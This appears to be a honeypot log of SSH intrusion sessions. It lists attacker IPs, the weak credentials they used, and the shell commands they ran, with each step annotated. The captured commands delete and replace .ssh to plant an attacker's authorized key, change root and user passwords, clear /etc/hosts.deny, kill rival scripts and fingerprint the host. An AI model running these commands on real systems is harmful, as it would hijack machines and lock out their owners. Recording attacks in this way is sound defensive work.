$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; Γ—2 // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo "root:UOGx49c2r0Mw"|chpasswd|bash
🎭 burger_root_34 (143.198.228.234) β€” Santa Clara, United States Β· 1 session Β· 19 cmds
2026-05-27 19:28 EDT Β· as root/Www123123
echo β†’ payload download from C2 β†’ execute from /tmp
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:z16iBX9utE3N"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 wraith_root_57 (45.194.37.246) β€” Hong Kong, Hong Kong Β· 1 session Β· 19 cmds
2026-05-27 18:29 EDT Β· as root/Passw0rd.1
echo β†’ payload download from C2 β†’ execute from /tmp
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:j0MlKBQpyy7Y"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 wok_root_13 (106.13.69.159) β€” Beijing, China Β· 2 sessions Β· 38 cmds
2026-05-27 18:22 EDT Β· as root/Qq112233.., root/v
echo β†’ payload download from C2 β†’ execute from /tmp
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo "root:5mRMngz7sxov"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; Γ—2 // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo "root:fygPK8tvEtBK"|chpasswd|bash
🎭 star_root_29 (108.175.164.22) β€” Piscataway, United States Β· 1 session Β· 19 cmds
2026-05-27 18:18 EDT Β· as root/Qq112233..
echo β†’ payload download from C2 β†’ execute from /tmp
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:P3G5ARzZhBHd"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 dutch_root_5 (176.65.139.203) β€” Eygelshoven, The Netherlands Β· 2 sessions Β· 2 cmds
2026-05-27 18:03 EDT Β· as admin/admin, root/root
Ran uname 2x across 2 sessions β€” automated OS fingerprinting.
$ uname -a ; echo 'vT' Γ—2
🎭 cipher_root_50 (83.224.141.42) β€” Milan, Italy Β· 2 sessions Β· 40 cmds
2026-05-27 14:47 EDT Β· as miguel/123456, torrent/torrent
Ran uname 2x across 2 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo -e "torrent\nFRZb9HEdtLpt\nFRZb9HEdtLpt"|passwd|bash
$ Enter new UNIX password: Γ—2
$ echo "torrent\nFRZb9HEdtLpt\nFRZb9HEdtLpt\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo -e "123456\ng8fudTRdR1QO\ng8fudTRdR1QO"|passwd|bash
$ echo "123456\ng8fudTRdR1QO\ng8fudTRdR1QO\n"|passwd
🎭 kite_root (202.184.134.88) β€” Kuala Lumpur, Malaysia Β· 3 sessions Β· 60 cmds
2026-05-07 04:05 EDT Β· as deploy/pass, miguel/123456, torrent/torrent
Ran uname 2x across 2 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—3 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—3 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—3 // CPU profiling
$ echo -e "torrent\nwWekIccDCFvf\nwWekIccDCFvf"|passwd|bash
$ Enter new UNIX password: Γ—3
$ echo "torrent\nwWekIccDCFvf\nwWekIccDCFvf\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—3 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—3
$ ls -lh $(which ls) Γ—3
$ which ls Γ—3
$ crontab -l Γ—3 // persistence setup
$ w Γ—3 // logged-in users check
$ uname -m Γ—3
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—3 // CPU profiling
$ top Γ—3 // process monitoring
$ uname Γ—3 // OS identification
$ uname -a Γ—3 // OS/kernel identification
$ whoami Γ—3 // privilege check
$ lscpu | grep Model Γ—3
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—3
$ echo -e "123456\nAAmsMAC3BVZh\nAAmsMAC3BVZh"|passwd|bash
$ echo "123456\nAAmsMAC3BVZh\nAAmsMAC3BVZh\n"|passwd
$ echo -e "pass\nBDEylsjEMSVV\nBDEylsjEMSVV"|passwd|bash
$ echo "pass\nBDEylsjEMSVV\nBDEylsjEMSVV\n"|passwd
🎭 eagle_root_14 (34.123.134.194) β€” Council Bluffs, United States Β· 5 sessions Β· 98 cmds
2026-05-24 01:38 EDT Β· as admin/adminadminadmin, postfixtester/12345678, root/!QAZxsw2#EDC
Ran uname 2x across 2 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—5 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—5 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—5 // CPU profiling
$ echo -e "torrent\nWOSNVBPeTbEn\nWOSNVBPeTbEn"|passwd|bash
$ Enter new UNIX password: Γ—3
$ echo "torrent\nWOSNVBPeTbEn\nWOSNVBPeTbEn\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—5 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—5
$ ls -lh $(which ls) Γ—5
$ which ls Γ—5
$ crontab -l Γ—5 // persistence setup
$ w Γ—5 // logged-in users check
$ uname -m Γ—5
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—5 // CPU profiling
$ top Γ—5 // process monitoring
$ uname Γ—5 // OS identification
$ uname -a Γ—5 // OS/kernel identification
$ whoami Γ—5 // privilege check
$ lscpu | grep Model Γ—5
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—5
$ echo -e "12345678\ni06rA7mf8ahi\ni06rA7mf8ahi"|passwd|bash
$ echo "12345678\ni06rA7mf8ahi\ni06rA7mf8ahi\n"|passwd
$ echo "root:hnR3jXzfMfem"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; Γ—2 // execute from /tmp
$ echo "root:g7de5yC70F2z"|chpasswd|bash
$ echo -e "adminadminadmin\nionmQQl53w5L\nionmQQl53w5L"|passwd|bash
$ echo "adminadminadmin\nionmQQl53w5L\nionmQQl53w5L\n"|passwd
🎭 shogun_root_6 (43.165.174.224) β€” Tokyo, Japan Β· 2 sessions Β· 40 cmds
2026-05-27 14:44 EDT Β· as miguel/123456, torrent/torrent
Ran uname 2x across 2 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo -e "123456\nUrYoviisXfeG\nUrYoviisXfeG"|passwd|bash
$ Enter new UNIX password: Γ—2
$ echo "123456\nUrYoviisXfeG\nUrYoviisXfeG\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo -e "torrent\nuifK8hAlkEjN\nuifK8hAlkEjN"|passwd|bash
$ echo "torrent\nuifK8hAlkEjN\nuifK8hAlkEjN\n"|passwd
🎭 spice_root_7 (203.192.232.180) β€” Mumbai, India Β· 1 session Β· 19 cmds
2026-05-27 14:44 EDT Β· as root/Abcd1234@
Ran uname 2x across 2 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:GrJ2KrnXkLrz"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 strudel_3 (178.104.171.151) β€” Nuremberg, Germany Β· 1 session Β· 20 cmds
2026-05-27 14:38 EDT Β· as torrent/torrent
Ran uname 2x across 2 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "torrent\nYpzThtVv2I2z\nYpzThtVv2I2z"|passwd|bash
$ Enter new UNIX password:
$ echo "torrent\nYpzThtVv2I2z\nYpzThtVv2I2z\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 ghost_root_70 (152.32.163.183) β€” Ho Chi Minh City, Vietnam Β· 1 session Β· 19 cmds
2026-05-27 14:25 EDT Β· as root/Qwer@4321
Ran uname 2x across 2 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:KPjuYRU6s7FD"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 phantom_root_9 (196.196.150.6) β€” Valencia, Spain Β· 1 session Β· 20 cmds
2026-05-27 14:01 EDT Β· as mailuser/123456
Ran uname 2x across 2 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "123456\nO1kJfm7XgPeD\nO1kJfm7XgPeD"|passwd|bash
$ Enter new UNIX password:
$ echo "123456\nO1kJfm7XgPeD\nO1kJfm7XgPeD\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 eagle_root_26 (166.62.41.26) β€” Tempe, United States Β· 1 session Β· 20 cmds
2026-05-27 14:01 EDT Β· as mailuser/123456
Ran uname 2x across 2 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "123456\nwgfmf25ZQd4B\nwgfmf25ZQd4B"|passwd|bash
$ Enter new UNIX password:
$ echo "123456\nwgfmf25ZQd4B\nwgfmf25ZQd4B\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 wok_root_14 (180.76.225.175) β€” Beijing, China Β· 1 session Β· 1 cmd
2026-05-27 13:52 EDT Β· as root/ο»Ώ------fuck------
